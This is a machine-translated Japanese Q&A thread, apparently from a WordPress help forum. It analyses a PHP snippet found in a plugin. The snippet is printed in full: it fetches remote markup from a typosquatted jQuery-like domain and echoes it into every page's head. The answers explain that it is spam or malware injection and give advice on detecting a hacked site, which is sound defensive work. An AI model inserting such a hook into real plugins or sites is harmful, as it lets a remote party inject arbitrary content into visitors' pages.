プラグインでこれを見つけました。それは何をするためのものか？それは危険ですか？

プラグインでこれを見つけました。それは何をするためのものか？それは危険ですか？

add_action('admin_enqueue_scripts', 'pw_load_scripts');
if (!function_exists('wp__head'){
function wp__head() {
    if(function_exists('curl_init')) { 
        $ch = curl_init();
        curl_setopt($ch,CURLOPT_URL,"http://www.jqury.net/?1"); 
        curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 
        curl_setopt($ch, CURLOPT_REFERER, $_SERVER['HTTP_HOST']);
        curl_setopt($ch,CURLOPT_CONNECTTIMEOUT,10); 
        $jquery = curl_exec($ch);  
        curl_close($ch); 
        echo "$jquery";
    }
}
add_action('wp_head', 'wp__head');
}

ドメインのスペルミスが多いドメインからスパムを含むマークアップのブロックをロードします（ソースの一部を投稿することを考えていましたが、コンテンツを宣伝したくありません）http://jquery.com/--jQueryによって使用されます、評判がよく人気のあるJavascriptライブラリであり、WordPressがCoreに含まれています。実際には非常に異なるものをロードするときに、そのライブラリをロードしているように見えるというのがアイデアだと思います。

そして、jQueryをロードしているように見えることを試みる他の方法があります。変数名に注意してください$jquery。

悪意のあるスクリプトもロードしようとする可能性があります。チェックしませんでした。私はでしょう間違いなくそのページのコンテンツは、ドメインコントローラがそのように感じるいつでも変更することができ、特に以来、危険なそれを呼び出します。

せいぜい、スパムを拡散するサイトを検索エンジンが見下ろしているため、サイトに損害を与えるだけです。

使用しないでください。それはあなたにとっても、サイトを運営している人々以外のウェブ上の誰にとっても有益なことではありません。評判の良いサイトでこれを見つけた場合は、彼らに報告してください。

はい、それは危険なコードであり、スパムサイトからコンテンツをロードします。

プラグインに名前を付けませんでしたが、Webサイトにインストールした後にこのコードを見つけた場合、プラグインコードはこのような開発者からのものではなく、インストール後にハッキングされた可能性があります。この場合、このプラグインだけでなく、Webサイトの多くで悪意のあるコードが見つかる可能性があります。

元々プラグインを入手した場所からダウンロードしたプラグインコードを確認し、この悪意のあるコードが元々そこにあったかどうかを確認します。そうでない場合は、サイトがハッキングされています。それが事実であると判断した場合は、Codexからこの記事をお読みください。